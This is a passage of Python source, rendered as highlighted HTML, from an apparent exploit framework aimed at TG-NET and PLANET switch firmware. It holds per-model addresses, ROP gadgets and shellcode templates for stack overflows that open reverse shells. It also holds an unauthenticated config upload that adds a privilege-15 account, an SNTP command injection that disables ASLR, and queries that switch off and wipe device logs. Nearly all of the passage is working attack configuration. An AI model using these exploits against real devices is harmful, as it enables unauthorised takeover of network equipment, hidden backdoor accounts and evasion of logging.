						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x4BA5D0</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x4BA5D0</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x43764C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x43764C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x431CC4</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password=_PWDNOP_RA_START&amp;login=1&amp;shellcod=_USRNOP_USRNOP_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffe6e04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">53</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">45</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># TG-NET Botone Technology Co.,Ltd.</span>
			<span class="token comment"># (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology)</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'222-81176'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'TG-NET'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'3.1.1-R1'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'P3026M-24POE (V3)'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'http://www.tg-net.net/productshow.asp?ProdNum=1049&amp;parentid=98'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40C74C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484a2d4</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x46AC10</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x46E368</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x46E368</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42243C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42243C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x424DE0</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment"># Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),</span>
					<span class="token comment"># and to fill wider area with sending '&amp;%8f%84%01=%8f%84%80%18' where:</span>
					<span class="token comment"># </span>
					<span class="token comment"># NOP's</span>
					<span class="token comment"># '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00</span>
					<span class="token comment"># '%24%04%FF%FF' : li $a0, 0xFFFFFFFF</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_RA_START&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;login=1'</span><span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">'&amp;%24%04%FF=%24%04%FF%FF'</span> <span class="token operator">*</span> <span class="token number">50</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x10010104</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span> <span class="token punctuation">:</span><span class="token number">0x10600604</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">28</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">20</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

		<span class="token punctuation">}</span>

		<span class="token comment">#</span>
		<span class="token comment"># Vendor templates, Vendor_ETag() will be merged to here</span>
		<span class="token comment"># (dont delete anything here thats not moved to Vendor_ETag())</span>
		<span class="token comment">#</span>

		Vendor_Template <span class="token operator">=</span> <span class="token punctuation">{</span>
			<span class="token comment">#</span>
			<span class="token string">'Planet'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'PLANET Technology Corp.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=5121'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_5132=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">184</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;login=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token comment">#'encryption':'nopassword',</span>
						<span class="token comment">#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=526&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
